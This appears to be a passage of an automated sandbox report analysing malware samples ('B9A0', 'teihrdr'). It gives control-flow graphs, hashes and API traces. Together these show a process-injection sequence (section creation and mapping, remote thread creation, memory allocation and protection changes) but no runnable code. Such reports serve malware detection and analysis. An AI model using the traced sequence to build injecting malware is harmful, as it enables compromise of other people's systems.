                                          • SetErrorMode.KERNELBASE(00000000,?,?,01FA0223,?,?), ref: 01FA0E1E
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2645014782.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fa0000_B9A0.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: cb8a2fa6b6314028a024efa7a5c923e9ca64f27433e393fd74be4ccb9015de38
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: 44D01231545128B7DB002A94DC09BCD7F1CDF09B62F408011FB0DD9080CB75954046E5
                                          Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 352 401991-4019ed call 401240 Sleep 364 4019f3-4019f5 352->364 365 4019ee call 4014c4 352->365 366 401a04-401a24 364->366 367 4019f7-4019ff call 4015b7 364->367 365->364 373 401a32 366->373 374 401a29-401a35 366->374 367->366 373->374 376 401a46 374->376 377 401a3a-401a52 call 401240 374->377 376->377
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                          • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                          • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                          • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF
                                          Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 381 4019a9-4019ed call 401240 Sleep 393 4019f3-4019f5 381->393 394 4019ee call 4014c4 381->394 395 401a04-401a24 393->395 396 4019f7-4019ff call 4015b7 393->396 394->393 402 401a32 395->402 403 401a29-401a35 395->403 396->395 402->403 405 401a46 403->405 406 401a3a-401a52 call 401240 403->406 405->406
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                          • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                          • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                          • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF
                                          Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 410 4019af-4019ed call 401240 Sleep 417 4019f3-4019f5 410->417 418 4019ee call 4014c4 410->418 419 401a04-401a24 417->419 420 4019f7-4019ff call 4015b7 417->420 418->417 426 401a32 419->426 427 401a29-401a35 419->427 420->419 426->427 429 401a46 427->429 430 401a3a-401a52 call 401240 427->430 429->430
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                          • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                          • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                          • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B
                                          Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 434 4019b8-4019ed call 401240 Sleep 438 4019f3-4019f5 434->438 439 4019ee call 4014c4 434->439 440 401a04-401a24 438->440 441 4019f7-4019ff call 4015b7 438->441 439->438 447 401a32 440->447 448 401a29-401a35 440->448 441->440 447->448 450 401a46 448->450 451 401a3a-401a52 call 401240 448->451 450->451
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                          • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                          • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                          • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                          Function 0059F1E4 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 455 59f1e4-59f21e call 59f4f7 458 59f26c 455->458 459 59f220-59f253 VirtualAlloc call 59f271 455->459 458->458 461 59f258-59f26a 459->461 461->458
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0059F235
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644866394.000000000058D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0058D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_58d000_B9A0.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: b998c0787fde743c1faaa00c6b6383a1fde40c4b179baa501c1335e54fd56591
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: E7112B79A00208EFDB01DF98C985E99BFF5AF08351F1580A4F9489B362D371EA50DB80

                                          Execution Graph

                                          Execution Coverage:7.9%
                                          Dynamic/Decrypted Code Coverage:42.6%
                                          Signature Coverage:0%
                                          Total number of Nodes:122
                                          Total number of Limit Nodes:4
                                          execution_graph 3452 402e40 3454 402e37 3452->3454 3455 402edf 3454->3455 3456 4018e6 3454->3456 3457 4018f5 3456->3457 3458 40192e Sleep 3457->3458 3459 401949 3458->3459 3461 40195a 3459->3461 3462 401514 3459->3462 3461->3455 3463 401524 3462->3463 3464 4015c4 NtDuplicateObject 3463->3464 3468 4016e0 3463->3468 3465 4015e1 NtCreateSection 3464->3465 3464->3468 3466 401661 NtCreateSection 3465->3466 3467 401607 NtMapViewOfSection 3465->3467 3466->3468 3470 40168d 3466->3470 3467->3466 3469 40162a NtMapViewOfSection 3467->3469 3468->3461 3469->3466 3471 401648 3469->3471 3470->3468 3472 401697 NtMapViewOfSection 3470->3472 3471->3466 3472->3468 3473 4016be NtMapViewOfSection 3472->3473 3473->3468 3569 401542 3570 40153b 3569->3570 3571 4016e0 3570->3571 3572 4015c4 NtDuplicateObject 3570->3572 3572->3571 3573 4015e1 NtCreateSection 3572->3573 3574 401661 NtCreateSection 3573->3574 3575 401607 NtMapViewOfSection 3573->3575 3574->3571 3577 40168d 3574->3577 3575->3574 3576 40162a NtMapViewOfSection 3575->3576 3576->3574 3578 401648 3576->3578 3577->3571 3579 401697 NtMapViewOfSection 3577->3579 3578->3574 3579->3571 3580 4016be NtMapViewOfSection 3579->3580 3580->3571 3478 70003c 3479 700049 3478->3479 3491 700e0f SetErrorMode SetErrorMode 3479->3491 3484 700265 3485 7002ce VirtualProtect 3484->3485 3487 70030b 3485->3487 3486 700439 VirtualFree 3490 7004be LoadLibraryA 3486->3490 3487->3486 3489 7008c7 3490->3489 3492 700223 3491->3492 3493 700d90 3492->3493 3494 700dad 3493->3494 3495 700dbb GetPEB 3494->3495 3496 700238 VirtualAlloc 3494->3496 3495->3496 3496->3484 3497 740d78 3498 740d87 3497->3498 3501 741518 3498->3501 3502 741533 3501->3502 3503 74153c CreateToolhelp32Snapshot 3502->3503 3504 741558 Module32First 3502->3504 3503->3502 3503->3504 3505 741567 3504->3505 3507 740d90 3504->3507 3508 7411d7 3505->3508 3509 741202 3508->3509 3510 741213 VirtualAlloc 3509->3510 3511 74124b 3509->3511 3510->3511 3511->3511 3632 402dd0 3633 402ddc 3632->3633 3634 4018e6 8 API calls 3633->3634 3635 402edf 3633->3635 3634->3635 3520 700001 3521 700005 3520->3521 3526 70092b GetPEB 3521->3526 3523 700030 3528 70003c 3523->3528 3527 700972 3526->3527 3527->3523 3529 700049 3528->3529 3530 700e0f 2 API calls 3529->3530 3531 700223 3530->3531 3532 700d90 GetPEB 3531->3532 3533 700238 VirtualAlloc 3532->3533 3534 700265 3533->3534 3535 7002ce VirtualProtect 3534->3535 3537 70030b 3535->3537 3536 700439 VirtualFree 3540 7004be LoadLibraryA 3536->3540 3537->3536 3539 7008c7 3540->3539 3550 4018f1 3551 4018f6 3550->3551 3552 40192e Sleep 3551->3552 3553 401949 3552->3553 3554 401514 7 API calls 3553->3554 3555 40195a 3553->3555 3554->3555 3545 700005 3546 70092b GetPEB 3545->3546 3547 700030 3546->3547 3548 70003c 7 API calls 3547->3548 3549 700038 3548->3549 3619 401915 3620 4018c6 3619->3620 3621 40191a 3619->3621 3622 40192e Sleep 3621->3622 3623 401949 3622->3623 3624 401514 7 API calls 3623->3624 3625 40195a 3623->3625 3624->3625 3474 402f97 3475 4030ee 3474->3475 3476 402fc1 3474->3476 3476->3475 3477 40307c RtlCreateUserThread NtTerminateProcess 3476->3477 3477->3475 3605 740d6c 3606 740d78 3605->3606 3607 741518 3 API calls 3606->3607 3608 740d90 3607->3608 3609 402d7b 3611 402d38 3609->3611 3610 4018e6 8 API calls 3612 402dc7 3610->3612 3611->3609 3611->3610 3611->3612 3556 4014fe 3557 401506 3556->3557 3558 401531 3556->3558 3559 4015c4 NtDuplicateObject 3558->3559 3563 4016e0 3558->3563 3560 4015e1 NtCreateSection 3559->3560 3559->3563 3561 401661 NtCreateSection 3560->3561 3562 401607 NtMapViewOfSection 3560->3562 3561->3563 3565 40168d 3561->3565 3562->3561 3564 40162a NtMapViewOfSection 3562->3564 3564->3561 3566 401648 3564->3566 3565->3563 3567 401697 NtMapViewOfSection 3565->3567 3566->3561 3567->3563 3568 4016be NtMapViewOfSection 3567->3568 3568->3563

                                          Executed Functions

                                          Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 115 4015c4-4015db NtDuplicateObject 104->115 105->106 111 4018c5 106->111 112 4018bc-4018e3 call 401193 106->112 111->112 115->105 117 4015e1-401605 NtCreateSection 115->117 119 401661-401687 NtCreateSection 117->119 120 401607-401628 NtMapViewOfSection 117->120 119->105 123 40168d-401691 119->123 120->119 122 40162a-401646 NtMapViewOfSection 120->122 122->119 125 401648-40165e 122->125 123->105 126 401697-4016b8 NtMapViewOfSection 123->126 125->119 126->105 127 4016be-4016da NtMapViewOfSection 126->127 127->105 129 4016e0 call 4016e5 127->129
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                          • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                          • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                          • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                          Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 162 4015c4-4015db NtDuplicateObject 151->162 152->153 158 4018c5 153->158 159 4018bc-4018e3 call 401193 153->159 158->159 162->152 164 4015e1-401605 NtCreateSection 162->164 166 401661-401687 NtCreateSection 164->166 167 401607-401628 NtMapViewOfSection 164->167 166->152 170 40168d-401691 166->170 167->166 169 40162a-401646 NtMapViewOfSection 167->169 169->166 172 401648-40165e 169->172 170->152 173 401697-4016b8 NtMapViewOfSection 170->173 172->166 173->152 174 4016be-4016da NtMapViewOfSection 173->174 174->152 176 4016e0 call 4016e5 174->176
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectView
                                          • String ID:
                                          • API String ID: 1652636561-0
                                          • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                          • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                          • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                          • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                          Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 206 4015c4-4015db NtDuplicateObject 195->206 196->197 202 4018c5 197->202 203 4018bc-4018e3 call 401193 197->203 202->203 206->196 208 4015e1-401605 NtCreateSection 206->208 210 401661-401687 NtCreateSection 208->210 211 401607-401628 NtMapViewOfSection 208->211 210->196 214 40168d-401691 210->214 211->210 213 40162a-401646 NtMapViewOfSection 211->213 213->210 216 401648-40165e 213->216 214->196 217 401697-4016b8 NtMapViewOfSection 214->217 216->210 217->196 218 4016be-4016da NtMapViewOfSection 217->218 218->196 220 4016e0 call 4016e5 218->220
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                          • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                          • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                          • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                          Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 245 4015c4-4015db NtDuplicateObject 234->245 235->236 241 4018c5 236->241 242 4018bc-4018e3 call 401193 236->242 241->242 245->235 247 4015e1-401605 NtCreateSection 245->247 249 401661-401687 NtCreateSection 247->249 250 401607-401628 NtMapViewOfSection 247->250 249->235 253 40168d-401691 249->253 250->249 252 40162a-401646 NtMapViewOfSection 250->252 252->249 255 401648-40165e 252->255 253->235 256 401697-4016b8 NtMapViewOfSection 253->256 255->249 256->235 257 4016be-4016da NtMapViewOfSection 256->257 257->235 259 4016e0 call 4016e5 257->259
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                          • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                          • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                          • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                          Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 285 4015c4-4015db NtDuplicateObject 274->285 275->276 281 4018c5 276->281 282 4018bc-4018e3 call 401193 276->282 281->282 285->275 287 4015e1-401605 NtCreateSection 285->287 289 401661-401687 NtCreateSection 287->289 290 401607-401628 NtMapViewOfSection 287->290 289->275 293 40168d-401691 289->293 290->289 292 40162a-401646 NtMapViewOfSection 290->292 292->289 295 401648-40165e 292->295 293->275 296 401697-4016b8 NtMapViewOfSection 293->296 295->289 296->275 297 4016be-4016da NtMapViewOfSection 296->297 297->275 299 4016e0 call 4016e5 297->299
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                          • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                          • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                          • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                          Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: CreateProcessTerminateThreadUser
                                          • String ID:
                                          • API String ID: 1921587553-0
                                          • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                          • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5
                                          Function 0070003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 70003c-700047 1 700049 0->1 2 70004c-700263 call 700a3f call 700e0f call 700d90 VirtualAlloc 0->2 1->2 17 700265-700289 call 700a69 2->17 18 70028b-700292 2->18 23 7002ce-7003c2 VirtualProtect call 700cce call 700ce7 17->23 20 7002a1-7002b0 18->20 22 7002b2-7002cc 20->22 20->23 22->20 29 7003d1-7003e0 23->29 30 7003e2-700437 call 700ce7 29->30 31 700439-7004b8 VirtualFree 29->31 30->29 33 7005f4-7005fe 31->33 34 7004be-7004cd 31->34 37 700604-70060d 33->37 38 70077f-700789 33->38 36 7004d3-7004dd 34->36 36->33 40 7004e3-700505 36->40 37->38 43 700613-700637 37->43 41 7007a6-7007b0 38->41 42 70078b-7007a3 38->42 52 700517-700520 40->52 53 700507-700515 40->53 44 7007b6-7007cb 41->44 45 70086e-7008be LoadLibraryA 41->45 42->41 46 70063e-700648 43->46 48 7007d2-7007d5 44->48 51 7008c7-7008f9 45->51 46->38 49 70064e-70065a 46->49 54 700824-700833 48->54 55 7007d7-7007e0 48->55 49->38 50 700660-70066a 49->50 56 70067a-700689 50->56 58 700902-70091d 51->58 59 7008fb-700901 51->59 60 700526-700547 52->60 53->60 57 700839-70083c 54->57 61 7007e2 55->61 62 7007e4-700822 55->62 63 700750-70077a 56->63 64 70068f-7006b2 56->64 57->45 65 70083e-700847 57->65 59->58 66 70054d-700550 60->66 61->54 62->48 63->46 69 7006b4-7006ed 64->69 70 7006ef-7006fc 64->70 71 700849 65->71 72 70084b-70086c 65->72 67 7005e0-7005ef 66->67 68 700556-70056b 66->68 67->36 74 70056d 68->74 75 70056f-70057a 68->75 69->70 76 70074b 70->76 77 7006fe-700748 70->77 71->45 72->57 74->67 78 70059b-7005bb 75->78 79 70057c-700599 75->79 76->56 77->76 84 7005bd-7005db 78->84 79->84 84->66
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0070024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2780540702.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_700000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: 9be9b3c6779dbc4fec803037c48c4e54be1ef0d9e37ab80a9898581bd6dc0544
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
